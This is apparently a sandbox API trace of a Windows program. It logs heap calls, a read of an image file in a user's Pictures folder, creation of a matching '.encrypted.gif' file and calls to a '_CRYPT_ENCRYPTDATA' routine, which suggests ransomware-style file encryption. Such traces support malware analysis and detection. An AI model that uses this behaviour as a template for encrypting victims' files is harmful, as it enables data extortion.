RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0040.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0040.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae9a8 [0040.168] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.168] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0040.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0040.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0040.168] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0040.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0040.168] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0040.169] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0040.169] CryptDestroyHash (hHash=0x7c2100) returned 1 [0040.169] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0040.169] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0040.169] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0040.169] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0040.169] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0040.169] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0040.169] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0040.169] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.169] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0040.169] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0040.169] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0040.169] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0040.169] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.169] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0040.169] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0040.169] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da138 [0040.169] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.169] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.169] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.169] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0040.169] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0040.169] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0040.169] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0040.169] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0040.169] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\EN4vTZXy-xQnxDkqMy.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\4hhx5h ujxbt\\en4vtzxy-xqnxdkqmy.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0040.170] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0040.170] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0040.170] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0040.170] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0040.170] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0040.170] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0040.170] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0040.170] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0040.170] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0040.170] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0040.170] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.170] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0040.170] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0040.170] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0040.170] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0040.170] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0040.170] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0040.170] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0040.170] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.170] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0040.170] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.170] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0040.170] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0040.170] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0040.170] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0040.170] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0040.170] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0040.171] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0040.171] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0040.171] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0040.171] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0040.171] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0040.171] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0040.171] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0040.171] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0040.171] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0040.171] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0040.171] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0040.171] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0040.171] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0040.171] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0040.171] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0040.171] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0040.171] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0040.171] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0040.171] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0040.171] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0040.171] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3630 [0040.171] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0040.171] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc0) returned 0x7c95d0 [0040.171] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0040.171] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db378 [0040.171] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0040.171] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db300 [0040.171] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c95d0 | out: hHeap=0x770000) returned 1 [0040.171] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0040.171] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0040.171] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0040.171] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3630 | out: hHeap=0x770000) returned 1 [0040.172] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0040.172] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db378 | out: hHeap=0x770000) returned 1 [0040.172] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0040.172] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0040.172] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0040.172] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0040.172] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0040.172] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\4hhx5h ujxbt")) returned 0x10 [0040.172] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0040.172] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0040.172] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db300 | out: hHeap=0x770000) returned 1 [0040.172] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0040.172] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0040.172] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0040.172] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0040.172] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab2010 [0040.172] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0040.172] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0040.172] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\EN4vTZXy-xQnxDkqMy.encrypted.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\4hhx5h ujxbt\\en4vtzxy-xqnxdkqmy.encrypted.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0040.172] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0040.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0040.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0040.173] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0040.173] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0040.173] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0040.173] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0040.173] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0040.173] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0040.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0040.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0040.173] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0040.173] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0040.173] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0040.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0040.173] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.173] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0040.173] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0040.173] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0040.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0040.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0040.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0040.173] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0040.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0040.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0040.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0040.173] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0040.173] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0040.173] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0040.173] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0040.174] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0040.174] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0040.174] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0040.174] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0040.174] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0040.174] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x10000, lpOverlapped=0x0) returned 1 [0040.176] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x38c5, lpOverlapped=0x0) returned 1 [0040.177] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0040.177] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0040.177] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0040.177] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0040.177] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0040.177] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x138c5) returned 0xac2018 [0040.178] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0040.178] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0040.178] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0040.178] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0040.178] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0040.178] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0040.178] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x138c5) returned 0x935008 [0040.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac2018 | out: hHeap=0x770000) returned 1 [0040.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0040.180] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.180] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0040.180] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0040.180] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0040.180] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0040.180] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0040.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x138c5) returned 0xac2018 [0040.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0040.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac2018 | out: hHeap=0x770000) returned 1 [0040.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0040.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0040.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0040.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0040.181] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0040.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0040.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0040.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0040.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0040.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0040.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0040.181] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0040.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0040.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0040.181] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0040.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0040.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0040.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da198 [0040.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0040.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0040.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0040.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0040.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x138c5) returned 0xac2018 [0040.181] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0040.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1b8 [0040.181] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0040.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0040.182] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0040.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da288 [0040.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0040.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0040.182] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0040.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da318 [0040.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0040.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3f8 [0040.182] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0040.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cee0 [0040.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0040.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0040.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0040.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0040.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0040.182] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x138c5) returned 0x9488d8 [0040.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0040.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0040.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0040.183] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0040.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0040.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0040.183] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0040.183] 